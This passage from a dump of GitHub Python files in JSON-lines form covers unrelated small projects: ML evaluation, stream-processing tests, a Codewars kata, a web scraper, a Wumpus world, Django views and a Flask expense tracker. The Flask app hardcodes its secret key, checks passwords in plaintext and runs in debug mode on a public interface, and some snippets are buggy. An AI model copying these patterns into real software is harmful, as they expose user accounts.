model.predict_proba(arr)[:,1]\npostTrainingToolkit.ROC_AUC(score=pred,y=y,weight=weights,plot_path=folder_path)\n\n\ntrain_score = model.predict_proba(data['train_features'])[:,1]\nval_score = model.predict_proba(data['val_features'])[:,1]\nkolS, kolB = postTrainingToolkit.KS_test(train_score,val_score,data['train_weight'],data['val_weight'],data['train_y'],data['val_y'],plotPath=folder_path)\nprint(f'{kolS}, {kolB}')\n\n\nres_explain, res_masks = model.explain(data['train_features'])\nnp.save(os.path.join(folder_path,'explain.npy'), res_explain)\nnp.save(os.path.join(folder_path,'mask.npy'),res_masks)\nnp.save(os.path.join(folder_path,'y.npy'),data['train_y'])\n#feature_importances_ = model._compute_feature_importances(data['train_features'])\n#print(feature_importances_)","repo_name":"kyj519/VcbMVAStudy","sub_path":"TabNet_Permutation/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5878780557","text":"class Portfolio():\n def __init__(self, stocks=[]):\n self.stocks = stocks\n\n def Profit(start, end):\n start_val = sum([x for x in stocks])\n return start_val\n\nclass Stock():\n def __init__(self, name, date, price):\n self.name = name\n self.date = date\n self.price = price\n\n def Price():\n return self.price\n\np = Portfolio()\n\n# Fake Stocks\ndef fake_stock():\n from random import randint, sample\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n name = \"\".join(sample(list(letters),randint(2,4)))\n price = randint(100,99999)/100\n return (name,price)\n\ndef fake_portfolio(n=10,start='20170101',end='20181231'):\n from datetime import date, datetime\n from workdays import workday\n import numpy as np\n from random import randint\n\n stocks = [fake_stock() for i in range (0, n)]\n dt = datetime.strptime(start, '%Y%m%d')\n result = dict()\n while dt <= datetime.strptime(end, '%Y%m%d'):\n price = [(value[0],round(list(np.random.normal(value[1],value[1]/randint(10,100),1))[0],2)) for key,value in enumerate(stocks)]\n dt = workday(dt,1)\n result[dt.strftime('%Y%m%d')] = price\n return result\n\nport = fake_portfolio()\nfor k,v in enumerate(port):\n print(v)","repo_name":"abracadani/fntl","sub_path":"fntl.py","file_name":"fntl.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12051563907","text":"'''\nSwap items in a dictionary (7 kyu)\nhttps://www.codewars.com/kata/5a21e090f28b824def00013c\n\nIn this kata, you will take the keys and values of a dict and swap them around.\nYou will be given a dictionary, and then you will want to return a dictionary with the old values as the keys, and list the old keys as values under their original keys.\n\nThe dictionary given will only contain strings.\nThe dictionary given will not be empty.\nYou do not have to sort the items in the lists.\n'''\n\ndef switch_dict(dic):\n switch = {}\n for k, v in dic.items():\n if v not in switch:\n switch[v] = [k]\n else:\n switch[v].append(k)\n return switch","repo_name":"zerqatu/codewars-katas","sub_path":"python/swap_items_in_dictionary.py","file_name":"swap_items_in_dictionary.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18492246881","text":"import base64\n\nfrom storey import Filter, JoinWithV3IOTable, JoinWithHttp, Map, Reduce, Source, NeedsV3ioAccess, HttpRequest, build_flow, WriteToV3IOStream\n\nimport aiohttp\nimport asyncio\nimport json\nimport time\n\n\nclass SetupKvTable(NeedsV3ioAccess):\n async def setup(self, table_path):\n connector = aiohttp.TCPConnector()\n client_session = aiohttp.ClientSession(connector=connector)\n for i in range(1, 10):\n request_body = json.dumps({'Item': {'secret': {'N': f'{10 - i}'}}})\n response = await client_session.request(\n 'PUT', f'{self._webapi_url}/{table_path}/{i}', headers=self._put_item_headers, data=request_body, ssl=False)\n assert response.status == 200, f'Bad response {await response.text()} to request {request_body}'\n\n\nclass SetupStream(NeedsV3ioAccess):\n async def setup(self, stream_path):\n connector = aiohttp.TCPConnector()\n client_session = aiohttp.ClientSession(connector=connector)\n request_body = json.dumps({\"ShardCount\": 2, \"RetentionPeriodHours\": 1})\n response = await client_session.request(\n 'POST', f'{self._webapi_url}/{stream_path}/', headers=self._create_stream_headers, data=request_body, ssl=False)\n assert response.status == 204, f'Bad response {await response.text()} to request {request_body}'\n\n\nclass GetShardData(NeedsV3ioAccess):\n async def get_shard_data(self, path):\n connector = aiohttp.TCPConnector()\n client_session = aiohttp.ClientSession(connector=connector)\n request_body = json.dumps({'Type': 'EARLIEST'})\n response = await client_session.request(\n 'PUT', f'{self._webapi_url}/{path}', headers=self._seek_headers, data=request_body, ssl=False)\n if response.status == 404:\n return []\n if response.status == 400: # Regression in 2.10\n body = await response.text()\n try:\n body_obj = json.loads(body)\n if body_obj['ErrorMessage'] == \"ResourceNotFoundException\":\n return []\n except:\n raise AssertionError(f'Got response status code 400: {body}')\n assert response.status == 200, await response.text()\n location = json.loads(await response.text())['Location']\n data = []\n while True:\n request_body = json.dumps({'Location': location})\n response = await client_session.request(\n 'PUT', f'{self._webapi_url}/{path}', headers=self._get_records_headers, data=request_body, ssl=False)\n assert response.status == 200, await response.text()\n response_dict = json.loads(await response.text())\n for record in response_dict['Records']:\n data.append(base64.b64decode(record['Data']))\n if response_dict['RecordsBehindLatest'] == 0:\n break\n location = response_dict['NextLocation']\n return data\n\n\ndef test_join_with_v3io_table():\n table_path = f'bigdata/test_join_with_v3io_table/{int(time.time_ns() / 1000)}'\n asyncio.run(SetupKvTable().setup(table_path))\n controller = build_flow([\n Source(),\n Map(lambda x: x + 1),\n Filter(lambda x: x < 8),\n JoinWithV3IOTable(lambda x: x.body, lambda x, y: y['secret'], table_path),\n Reduce(0, lambda x, y: x + y)\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n termination_result = controller.await_termination()\n assert termination_result == 42\n\n\ndef test_join_with_http():\n controller = build_flow([\n Source(),\n Map(lambda x: x + 1),\n Filter(lambda x: x < 8),\n JoinWithHttp(lambda _: HttpRequest('GET', 'https://google.com', ''), lambda _, response: response.status),\n Reduce(0, lambda x, y: x + y)\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n termination_result = controller.await_termination()\n assert termination_result == 200 * 7\n\n\ndef test_write_to_v3io_stream():\n stream_path = f'bigdata/test_write_to_v3io_stream/{int(time.time_ns() / 1000)}/'\n asyncio.run(SetupStream().setup(stream_path))\n controller = build_flow([\n Source(),\n Map(lambda x: str(x)),\n WriteToV3IOStream(stream_path, sharding_func=lambda event: int(event.body))\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n controller.await_termination()\n shard0_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/0'))\n assert shard0_data == [b'0', b'2', b'4', b'6', b'8']\n shard1_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/1'))\n assert shard1_data == [b'1', b'3', b'5', b'7', b'9']\n\n\ndef test_write_to_v3io_stream_unbalanced():\n stream_path = f'bigdata/test_write_to_v3io_stream/{int(time.time_ns() / 1000)}/'\n asyncio.run(SetupStream().setup(stream_path))\n controller = build_flow([\n Source(),\n Map(lambda x: str(x)),\n WriteToV3IOStream(stream_path, sharding_func=lambda event: 0)\n ]).run()\n for i in range(10):\n controller.emit(i)\n\n controller.terminate()\n controller.await_termination()\n shard0_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/0'))\n assert shard0_data == [b'0', b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8', b'9']\n shard1_data = asyncio.run(GetShardData().get_shard_data(f'{stream_path}/1'))\n assert shard1_data == []\n","repo_name":"v3io/storey","sub_path":"integration/test_flow_integration.py","file_name":"test_flow_integration.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26435709359","text":"from click.testing import CliRunner\nfrom gcli import search\n\n\n# search(path, ftype):\n\n\ndef test_search():\n runner = CliRunner()\n result = runner.invoke(search, [\"--path\", \".\", \"--ftype\", \"py\"])\n assert result.exit_code == 0\n assert \".py\" in result.output\n","repo_name":"noahgift/python-devops-course","sub_path":"test_gcli.py","file_name":"test_gcli.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"31"} +{"seq_id":"14118059487","text":"from flask import Flask, jsonify, render_template, session, request, redirect, url_for, abort\nfrom datetime import datetime\nfrom db import *\n# import plotly.graph_objs as go\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'cd85d99372e02261cc7fb70ef9b1ddfc'\n\n# class User(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# username = db.Column(db.String(80), unique=True, nullable=False)\n# password = db.Column(db.String(120), nullable=False)\n\n# class Expense(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n# title = db.Column(db.String(100), nullable=False)\n# cost = db.Column(db.Float, nullable=False)\n# date = db.Column(db.Date, nullable=False)\n# category = db.Column(db.String(50), nullable=False)\n\n# class Budget(db.Model):\n# id = db.Column(db.Integer, primary_key=True)\n# user_id = db.Column(db.Integer, nullable=False)\n# budget = db.Column(db.Float, nullable=False)\n# category = db.Column(db.String(80), nullable=False)\n# date = db.Column(db.Date, nullable=False)\n\n# experience_dict = {'Programming Language': ['Excel', 'Python', 'Tableau', 'R', 'Bash', 'Powershell'],\n# 'Years of Experience (As of April 2022)': [8,4,3,2,1,1]}\n# fig = px.bar(experience_dict, x='Programming Language',y='Years of Experience (As of April 2022)', color_discrete_sequence=['white'])\n# fig.update_layout (\n# paper_bgcolor' : \"rgba (0,0,0,0)\"\n# # plot_bgcolor : \"rgba (0,0,0,0)\"\n# font_color = 'white',\n# font_family = ' verdana\n# font_size = 20,\n# )\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n if check_user_exist(username):\n print(get_password(username))\n print(request.form['password'])\n if get_password(username) == request.form['password']:\n session['username'] = request.form['username']\n return redirect('/dashboard')\n else:\n return render_template('login.html', message='Invalid login credentials')\n else:\n return render_template('login.html', message='Invalid login credentials')\n return render_template('login.html')\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n username = request.form['username']\n if check_user_exist(username):\n return render_template('register.html', message='Username already exists')\n userpw = [username, request.form['password']]\n new_user(userpw)\n return redirect(url_for('login'))\n return render_template('register.html')\n\n@app.route(\"/logout\", methods=['GET', 'POST'])\ndef log_out():\n session.pop('username', None)\n return redirect('/')\n\n@app.route('/dashboard')\ndef dashboard():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n # return render_template('dashboard.html', username=username, data=data)\n return render_template('dashboard.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n\n@app.route('/logout')\ndef logout():\n session.pop('username', None)\n return redirect(url_for('login'))\n\n@app.route('/report_expense', methods=['POST'])\ndef report_expense():\n # Get the form data\n username = session['username']\n title = request.form.get('title')\n cost = request.form.get('cost')\n date_str = request.form.get('date')\n category = request.form.get('category')\n date = datetime.strptime(date_str, '%Y-%m-%d').date()\n data = [username, cost, title, category, date]\n import_expense(data)\n return redirect(url_for('expenses'))\n\n@app.route('/chart', methods=['POST', 'GET'])\ndef chart():\n x=['b', 'a', 'c', 'd']\n fig = go.Figure(go.Bar(x=x, y=[2,5,1,9], name='Montreal'))\n fig.add_trace(go.Bar(x=x, y=[1, 4, 9, 16], name='Ottawa'))\n fig.add_trace(go.Bar(x=x, y=[6, 8, 4.5, 8], name='Toronto'))\n fig.update_layout(barmode='stack', xaxis={'categoryorder':'total descending'})\n fig.show()\n\n # \n\n@app.route('/get_expenditures_by_category')\ndef get_expenditures_by_category():\n # Retrieve the user's expenditures by category data from the database\n # and organize it as a dictionary\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n expenditures = {}\n for row in data:\n print(f'row: {row}')\n if row[0] not in expenditures:\n expenditures[row[0]] = 0\n expenditures[row[0]] += row[1]\n \n\n return jsonify(expenditures)\n\n\n@app.route('/expenses')\ndef expenses():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n return render_template('expenses.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n \n@app.route('/budget')\ndef budget():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n return render_template('budget.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n \n\n@app.route('/about')\ndef about():\n if 'username' in session:\n username = session['username']\n data = get_expense(username)\n return render_template('about.html', username=username, data=data)\n else:\n return redirect(url_for('login'))\n\nif __name__ == \"__main__\": # true if this file NOT imported\n app.debug = True # enable auto-reload upon code change\n app.run(host = '0.0.0.0', port=80)\n","repo_name":"erica1i/GerLik-KnotS","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25755171641","text":"import cvxpy as cp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport librosa.display\n\nfrom numpy.typing import ArrayLike\nfrom ... import eq\nfrom .optimizer import Optimizer\n\n\n# from ..config import Config\n\n\nclass EQ3Optimizer(Optimizer):\n def __init__(self, config):\n self.config = config\n c = config\n \n self.filter_low, self.filter_mid, self.filter_high = eq.eq3_filters(\n cutoff_low=c.cutoff_low,\n center_mid=c.center_mid,\n cutoff_high=c.cutoff_high,\n sr=c.sr,\n )\n \n if c.spec_type == 'cqt':\n self.bin_freqs = librosa.cqt_frequencies(n_bins=c.num_cqt_bins, fmin=c.fmin, bins_per_octave=12)\n elif c.spec_type == 'mel':\n self.bin_freqs = librosa.mel_frequencies(c.num_mel_bins, fmin=c.fmin, fmax=c.fmax)\n else:\n raise ValueError(f'Unknown spec_type: {c.spec_type}')\n \n self.bin_gains = dict(\n low=eq.bin_gains(self.filter_low, self.bin_freqs, c.sr),\n mid=eq.bin_gains(self.filter_mid, self.bin_freqs, c.sr),\n high=eq.bin_gains(self.filter_high, self.bin_freqs, c.sr),\n )\n \n self.bins = dict(\n low=self.bin_freqs <= c.cutoff_low,\n mid=(c.mid_opt_range[0] < self.bin_freqs) & (self.bin_freqs < c.mid_opt_range[1]),\n high=c.cutoff_high <= self.bin_freqs,\n )\n \n self.band_gains = dict(\n low=self.bin_gains['low'][self.bins['low']],\n mid=self.bin_gains['mid'][self.bins['mid']],\n high=self.bin_gains['high'][self.bins['high']],\n )\n \n self.data = {}\n self.results = {}\n self.prob = None\n \n def optimize(\n self,\n S_dj: ArrayLike,\n S_prev: ArrayLike,\n S_next: ArrayLike,\n verbose=True\n ):\n c = self.config\n \n self.data['S_dj'] = S_dj\n self.data['S_prev'] = S_prev\n self.data['S_next'] = S_next\n \n num_frames = S_dj.shape[1]\n \n data = self.data\n losses = {}\n constraints = []\n \n for band in ['low', 'mid', 'high']:\n beta_prev = cp.Variable(shape=num_frames, pos=True, name=f'beta_prev_{band}')\n beta_next = cp.Variable(shape=num_frames, pos=True, name=f'beta_next_{band}')\n \n constraints += [\n beta_prev <= 1,\n beta_next <= 1,\n cp.diff(beta_prev) <= 0,\n cp.diff(beta_next) >= 0,\n ]\n \n Sband_dj = S_dj[self.bins[band]]\n Sband_prev = S_prev[self.bins[band]]\n Sband_next = S_next[self.bins[band]]\n \n # Reshape variables for broadcasting.\n beta_prev_ = cp.reshape(beta_prev, shape=(1, num_frames))\n beta_next_ = cp.reshape(beta_next, shape=(1, num_frames))\n \n H_min = self.band_gains[band].reshape(-1, 1)\n # H_inv = 1 - H_min\n H_prev = beta_prev_ + cp.multiply(1 - beta_prev_, H_min)\n H_next = beta_next_ + cp.multiply(1 - beta_next_, H_min)\n Y_prev = cp.multiply(H_prev, Sband_prev)\n Y_next = cp.multiply(H_next, Sband_next)\n Y = Y_prev + Y_next\n Y_true = Sband_dj\n \n # Mean absolute error. MSE makes errors from small signals insignificant.\n loss = cp.sum(cp.abs(Y - Y_true)) / np.prod(Sband_dj.shape) / Sband_dj.mean()\n losses[band] = loss\n data[band] = dict(\n Y_prev=Y_prev,\n Y_next=Y_next,\n Y=Y,\n )\n \n loss = cp.sum(list(losses.values()))\n objective = cp.Minimize(loss)\n self.prob = cp.Problem(objective, constraints)\n self.prob.solve(solver='ECOS', verbose=verbose)\n \n for deck in ['prev', 'next']:\n for band, min_db in zip(\n ['low', 'mid', 'high'],\n [-80, -27, -80]\n ):\n beta = self.prob.var_dict[f'beta_{deck}_{band}'].value\n db_gain = 20 * np.log10(beta + librosa.db_to_amplitude(min_db))\n self.results[f'eq_{deck}_{band}'] = beta\n self.results[f'eq_{deck}_{band}_db'] = db_gain\n \n return self.results\n \n def plot(\n self,\n S_est_mix_db,\n S_est_prev_db,\n S_est_next_db,\n title=None,\n true_curves=None,\n S_prev=None,\n S_next=None,\n ):\n from matplotlib.patches import Patch\n \n S_prev = self.data['S_prev'] if S_prev is None else S_prev\n S_next = self.data['S_next'] if S_next is None else S_next\n \n linestyle = '--'\n linewidth_eq = 2\n cmap = 'magma'\n colors = dict(\n low='#00FFFF',\n mid='#FF00FF',\n high='#FFFF00',\n )\n c = self.config\n y_axis = 'cqt_hz' if c.spec_type == 'cqt' else 'mel'\n \n S_prev_db = librosa.amplitude_to_db(S_prev)\n S_next_db = librosa.amplitude_to_db(S_next)\n S_dj_db = librosa.amplitude_to_db(self.data['S_dj'])\n \n vmin = np.min([\n S_est_prev_db.min(), S_est_next_db.min(), S_est_mix_db.min(),\n S_prev_db.min(), S_next_db.min(), S_dj_db.min(),\n ])\n vmax = np.max([\n S_est_prev_db.max(), S_est_next_db.max(), S_est_mix_db.max(),\n S_prev_db.max(), S_next_db.max(), S_dj_db.max(),\n ])\n \n def plot_spec(S_db, ax):\n librosa.display.specshow(\n S_db,\n sr=c.sr, hop_length=c.hop,\n x_axis='frames', y_axis=y_axis,\n # x_axis='frames', y_axis='mel',\n fmin=c.fmin, fmax=c.fmax,\n bins_per_octave=c.cqt_bins_per_octave,\n cmap=cmap, ax=ax,\n # Let value-to-color mapping equal for all plots:\n vmin=vmin, vmax=vmax,\n )\n ax.set_xlabel(None)\n ax.set_xticks([])\n if c.spec_type == 'cqt':\n ax.set_yticks([2 ** i for i in range(6, 14)])\n \n def plot_curves(deck, ax):\n axeq = ax.twinx() # instantiate a second axes that shares the same x-axis\n for band in ['low', 'mid', 'high']:\n eq_db = self.results[f'eq_{deck}_{band}_db']\n axeq.plot(eq_db, color=colors[band], linestyle=linestyle, linewidth=linewidth_eq)\n \n if true_curves is not None:\n for band in ['low', 'mid', 'high']:\n true_eq_db = true_curves[f'eq_{deck}_{band}_db']\n axeq.plot(true_eq_db, color=colors[band], linestyle='-', linewidth=linewidth_eq)\n \n axeq.set_ylim(-85, 5)\n axeq.set_yticks(np.arange(-80, 1, 20))\n axeq.set_ylabel('Gain (dB)')\n \n def plot_name(name, ax):\n fig.text(\n 0.01, 0.45, name,\n transform=ax.transAxes, fontsize=18, color='white',\n bbox=dict(facecolor='black', alpha=0.5, edgecolor='black')\n )\n \n fig, axes = plt.subplots(6, 1, figsize=(16, 9))\n # Previous ---------------------------------------------------------\n # The original track:\n ax = axes[0]\n plot_spec(S_prev_db, ax)\n plot_name('Raw prev', ax)\n # Legends:\n patches = [\n Patch(color=color, label=name)\n for name, color in colors.items()\n ]\n ax.legend(loc='upper right', handles=patches)\n # The optimized track:\n ax = axes[1]\n plot_spec(S_est_prev_db, ax)\n plot_name('Estimated prev', ax)\n plot_curves('prev', ax)\n \n # Mix --------------------------------------------------------------\n # The DJ mix:\n ax = axes[2]\n plot_spec(S_dj_db, ax)\n plot_name('DJ mix', ax)\n # The optimized mix:\n ax = axes[3]\n plot_spec(S_est_mix_db, ax)\n plot_name('Estimated mix', ax)\n \n # Next -------------------------------------------------------------\n # The original track:\n ax = axes[4]\n plot_spec(S_next_db, ax)\n plot_name('Raw next', ax)\n # The optimized track:\n ax = axes[5]\n plot_spec(S_est_next_db, ax)\n plot_name('Estimated next', ax)\n plot_curves('next', ax)\n \n # X-axis\n tick_frames = np.arange(0, S_dj_db.shape[1], S_dj_db.shape[1] // 10)\n tick_times = librosa.frames_to_time(tick_frames, sr=c.sr, hop_length=c.hop).round().astype(int)\n tick_labels = [f'{sec // 60:02}:{sec % 60:02}' for sec in tick_times]\n ax.set_xticks(tick_frames)\n ax.set_xticklabels(tick_labels)\n ax.set_xlabel('Time')\n \n if title:\n fig.suptitle(title)\n fig.tight_layout()\n fig.subplots_adjust(wspace=0, hspace=0.05)\n \n return fig\n","repo_name":"mir-aidj/djmix-dataset","sub_path":"djmix/cvxopt/optimizers/eq3_optimizer.py","file_name":"eq3_optimizer.py","file_ext":"py","file_size_in_byte":7828,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"17461086573","text":"import utils\r\n\r\n\r\nclass WumpusWorld:\r\n \"\"\"Clase para representar al mundo del Wumpus, básicamente su cueva\"\"\"\r\n def __init__(self) -> None:\r\n self.__size = (4, 4)\r\n self.__rooms = utils.generate_moves_between_cells()\r\n # print(*[f\"{k}: {v}\" for k, v in self.__rooms.items()], sep='\\n')\r\n # Elementos del mapa\r\n self.__pits = []\r\n self.__gold = ()\r\n self.__monster = ()\r\n self.__explorer = 1, 1\r\n\r\n @property\r\n def width(self):\r\n return self.__size[0]\r\n\r\n @property\r\n def height(self):\r\n return self.__size[1]\r\n\r\n @property\r\n def rooms(self):\r\n return self.__rooms\r\n\r\n def populate(self):\r\n # Hardcodeado, porque sigue un ejemplo, en la práctica, debería ser generado\r\n # aleatoriamente\r\n self.__pits.append((3, 1))\r\n self.__pits.append((3, 3))\r\n self.__pits.append((4, 4))\r\n\r\n self.__gold = (2, 3)\r\n self.__monster = (1, 3)\r\n\r\n def set_explorer(self, location: tuple[int, int]):\r\n \"\"\"Ubica al explorador (agente) en el mapa\"\"\"\r\n self.__explorer = location\r\n\r\n def __str__(self) -> str:\r\n world = []\r\n for row in range(self.height, 0, -1):\r\n line = \"|\"\r\n for col in range(1, self.width + 1):\r\n if self.__explorer == (col, row):\r\n line += \" E \"\r\n elif self.__gold == (col, row):\r\n line += \" G \"\r\n elif self.__monster == (col, row):\r\n line += \" W \"\r\n elif (col, row) in self.__pits:\r\n line += \" P \"\r\n else:\r\n line += \" \"\r\n line += \"|\"\r\n world.append(line)\r\n return \"\\n\".join(world)\r\n\r\n # Consultas acerca del mundo\r\n def is_smelly(self, pos: tuple[int, int]):\r\n neighbors = self.__rooms[pos]\r\n return self.__monster in neighbors\r\n\r\n def is_breezy(self, pos: tuple[int, int]):\r\n neighbors = self.__rooms[pos]\r\n # Debe revisar si hay algún pozo a su alrededor\r\n for pit in self.__pits:\r\n if pit in neighbors:\r\n return True\r\n return False\r\n\r\n def is_wumpus(self, pos: tuple[int, int]):\r\n return self.__monster == pos\r\n\r\n def is_pit(self, pos: tuple[int, int]):\r\n for pit in self.__pits:\r\n if pit == pos:\r\n return True\r\n return False\r\n\r\n def is_shiny(self, pos: tuple[int, int]):\r\n return pos == self.__gold\r\n\r\n\r\n__all__ = [\"WumpusWorld\"]\r\n\r\nif __name__ == \"__main__\":\r\n w = WumpusWorld()\r\n w.populate()\r\n print(w)\r\n","repo_name":"jsalazarloyola/wumpus_kb","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5335271355","text":"from django.shortcuts import render\nfrom .models import ChatRoom, ChatMessage\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n@login_required\ndef rooms(request):\n\n all_rooms = ChatRoom.objects.all()\n\n context = {\n 'chat_rooms': all_rooms,\n }\n\n return render(request, 'chatrooms/rooms.html', context)\n\n@login_required\ndef chatroom(request, slug):\n\n room = ChatRoom.objects.get(slug=slug)\n\n messages = ChatMessage.objects.filter(room=room)[0:25]\n\n context = {\n 'chatroom': room,\n 'messages': messages,\n }\n\n return render(request, 'chatrooms/chatroom.html', context)","repo_name":"LoisaKitakaya/chat-app","sub_path":"chatrooms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70812934487","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 9 04:18:35 2020\n\n@author: lukepinkel\n\"\"\"\n\n\nimport arviz as az # analysis:ignore\nimport numpy as np # analysis:ignore\nimport scipy as sp # analysis:ignore\nimport scipy.stats # analysis:ignore\nimport pandas as pd # analysis:ignore\nfrom ..pylmm.glmm_mcmc import MixedMCMC # analysis:ignore\nfrom .tests.test_data_mcmc import construct_model_matrices, vine_corr, multi_rand # analysis:ignore\n\ndef to_arviz_dict(samples, var_dict, burnin=0):\n az_dict = {}\n for key, val in var_dict.items():\n az_dict[key] = samples[:, burnin:, val]\n return az_dict \n\nn_grp, n_per = 300, 30\nn_obs = n_grp * n_per\nformula = \"y~x+(1|id1)\"\nbeta = np.array([-0.1, 0.5])\ndf = pd.DataFrame(np.zeros((n_obs, 6)), columns=['x', 'id1', 'u', 'eta', 'mu', 'y'])\ndf['id1'] = np.repeat(np.arange(n_grp), n_per)\nr = np.sqrt(0.9)\n_, Z, _, _ = construct_model_matrices(formula, df)\nu = np.random.normal(0, 1, size=n_grp)\nu = (u - u.mean()) / u.std() * np.sqrt(2.0)\ndf['u'] = Z.dot(u)\ndf['x'] = sp.stats.norm(-df['u'], np.sqrt((1-0.7)/0.7*df['u'].var())).rvs()\nX, Z, _, _ = construct_model_matrices(formula, df)\nlp = X.dot(beta) + Z.dot(u)\nlpvar = lp.var()\nrsq = r**2\nnp.sqrt((1-rsq)/rsq*lpvar)\ndf['eta'] = sp.stats.norm(lp, np.sqrt((1-rsq)/rsq*lpvar)).rvs()\ndf['mu'] = np.exp(df['eta']) / (1 + np.exp(df['eta']))\ndf['y'] = sp.stats.binom(n=1, p=df['mu']).rvs()\n\n\n\nmodel = MixedMCMC(formula, df)\n\nn_samples, n_chains = 15_000, 8\nsamples = np.zeros((n_chains, n_samples, model.n_params))\nsamples_u = np.zeros((n_chains, n_samples, model.n_re))\nsamples_p = np.zeros((n_chains, n_samples, model.n_ob))\n\nmodel.t_init[-1] = 20\nfor i in range(n_chains):\n samples[i], scnd = model.sample_slice_gibbs(n_samples, save_pred=True, save_u=True)\n samples_p[i] = scnd['pred']\n samples_u[i] = scnd['u']\n \nsamples = samples[:, :, :-1]\naz_dict = to_arviz_dict(samples, {\"$\\\\beta$\":np.arange(2), \n \"$\\\\theta$\":np.arange(2, 3)}, burnin=1000)\n\naz_data = az.from_dict(az_dict)\nsummary = az.summary(az_data)\nsummary['sampling_effeciency'] = summary['ess_mean'] / np.product(samples.shape[:2])\nranef_summary = az.summary(samples_u)\n\n\nprint(summary)\naz.plot_trace(az_data, var_names=['$\\\\theta$'])\naz.plot_trace(az_data, var_names=['$\\\\beta$'])\n\n\nyhat_summary = az.summary(samples_p)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lukepinkel/pylmm","sub_path":"tests/test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5194385212","text":"from nltk.util import pr\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef WebScrap(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n # print(soup.prettify())\n soupList = list(soup.children)\n # print(soupList)\n html = Html(soupList)\n Title(html)\n Body(html)\n FindPTag(soup)\n \n\n\ndef WebScrapWithClasses(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n print(\"cursivas: \" ,CursivaClass(soup))\n print(\"azul: \" ,CursivaClassAzul(soup))\n print(\"id: \", Id(soup,'parrafo1'))\n\n\ndef CursivaClass(soup):\n cursivas = soup.find_all('p', class_='cursiva')\n return cursivas\n\ndef CursivaClassAzul(soup):\n azul = soup.find_all('p', class_='azul')\n return azul\ndef Id(soup, id):\n parrafo = soup.find_all('p', id=id)\n return parrafo\n\ndef Html(soupList):\n html = list(soupList[2])\n print(\"HTML\" + \"\\n\")\n print(html)\n print(\"\\n\")\n return html\n\n\ndef Body(html):\n body = list(html[3].children)\n pOne = body[1].get_text()\n pTwo = body[3].get_text()\n\n print(\"P1: \" + pOne + \"\\n P2: \" + pTwo)\n\n\ndef FindPTag(soup):\n p = soup.find_all('p')\n # con soup.find('p') devolvería la primera\n\n print(\"Search by tag: \", p)\n\n\ndef Title(html):\n head = list(html[1].children)\n title = head[1]\n print(title.get_text())\n print(\"\\n\")\n\n\nclass main():\n # WebScrap('http://esp.uem.es/ssii/holaMundo.html')\n WebScrapWithClasses('http://esp.uem.es/ssii/holaMundo2.html')\n","repo_name":"somozadev/SISTEMAS_INTELIGENTES","sub_path":"Web_Scraper/webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14742941187","text":"# streams.py\n# streams: API URL endpoints to be called\n# properties:\n# : Plural stream name for the endpoint\n# path: API endpoint relative path, when added to the base URL, creates the full path,\n# default = stream_name\n# key_properties: Primary key fields for identifying an endpoint record.\n# replication_method: INCREMENTAL or FULL_TABLE\n# replication_keys: bookmark_field(s), typically a date-time, used for filtering the results\n# and setting the state\n# params: Query, sort, and other endpoint specific parameters; default = {}\n# data_key: JSON element containing the results list for the endpoint\n# bookmark_query_field: From date-time field used for filtering the 